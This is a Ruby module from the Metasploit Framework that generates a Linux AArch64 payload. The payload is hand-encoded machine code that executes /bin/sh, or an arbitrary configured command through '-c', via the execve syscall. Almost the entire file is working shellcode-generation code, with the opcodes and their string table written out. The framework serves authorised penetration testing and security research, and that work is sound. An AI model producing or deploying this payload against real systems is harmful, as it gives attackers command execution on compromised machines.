Path: blob/master/modules/payloads/singles/linux/aarch64/exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Single (non-staged) Linux AArch64 payload. It emits a small stub that calls
# execve on /bin/sh through `svc #0`, passing the CMD option via `-c` when one
# is set. The strings the stub needs are appended unencoded after the last
# instruction.
module MetasploitModule
  # NOTE(review): looks like the framework's cached size for this payload; it
  # is not computed anywhere in this file - confirm against the cache tooling.
  CachedSize = 64

  include Msf::Payload::Single
  include Msf::Payload::Linux::Aarch64::Prepends

  # Registers the payload metadata and the single, optional CMD option.
  #
  # @param info [Hash] caller-supplied metadata, handed to merge_info together
  #   with the values below
  def initialize(info = {})
    details = merge_info(
      info,
      'Name' => 'Linux Execute Command',
      'Description' => 'Execute an arbitrary command or just a /bin/sh shell',
      'Author' => 'Spencer McIntyre',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_AARCH64
    )
    super(details)

    command_option = OptString.new('CMD', [ false, 'The command string to execute' ])
    register_options([command_option])
  end

  # Builds the raw payload bytes.
  #
  # Every string is reached with a PC-relative `adr`, so each `adr` immediate
  # encodes the distance from that instruction to the string table that follows
  # the final `svc`. Adding or removing an instruction therefore means
  # re-encoding those immediates.
  #
  # @param _opts [Hash] not read here; the bare `super` forwards it unchanged
  # @return [String] `super.to_s` followed by the stub, with the stub zero-padded
  #   to a multiple of 4 bytes
  def generate(_opts = {})
    command = datastore['CMD'] || ''

    if command.empty?
      # execve("/bin/sh", NULL, NULL)
      opcodes = [
        0x100000a0, # adr x0, sh_str
        0xd2800001, # mov x1, #0
        0xd2800002, # mov x2, #0
        0xd2801ba8, # mov x8, #0xdd # __NR_execve
        0xd4000001  # svc #0
      ]
      string_table = ["/bin/sh\x00"]
    else
      # execve("/bin/sh", ["/bin/sh", "-c", CMD, NULL], NULL)
      # The argv array is written to the 32 bytes starting at the current sp.
      opcodes = [
        0x10000160, # adr x0, sh_str
        0x10000189, # adr x9, c_str
        0x1000018a, # adr x10, cmd_str
        0xf90003e0, # str x0, [sp, #0] ; argv[0] = "/bin/sh"
        0xf90007e9, # str x9, [sp, #8] ; argv[1] = "-c"
        0xf9000bea, # str x10, [sp, #16] ; argv[2] = CMD
        0xf9000fff, # str xzr, [sp, #24] ; argv[3] = NULL
        0x910003e1, # mov x1, sp
        0xd2800002, # mov x2, #0
        0xd2801ba8, # mov x8, #0xdd # __NR_execve
        0xd4000001  # svc #0
      ]
      string_table = [
        "/bin/sh\x00",
        # "-c" carries a second NUL so it occupies 4 bytes, which is the
        # distance to cmd_str that the `adr x10` immediate encodes.
        "-c\x00\x00",
        # CMD bytes exactly as configured, followed by the terminating NUL.
        command + "\x00"
      ]
    end

    # Append the strings left to right onto the little-endian instruction words.
    stub = string_table.reduce(opcodes.pack('V*')) { |bytes, piece| bytes + piece }

    # Zero-pad so the stub's length is a multiple of 4 bytes.
    padding = (-stub.bytesize) % 4
    stub += "\x00" * padding unless padding.zero?

    super.to_s + stub
  end
end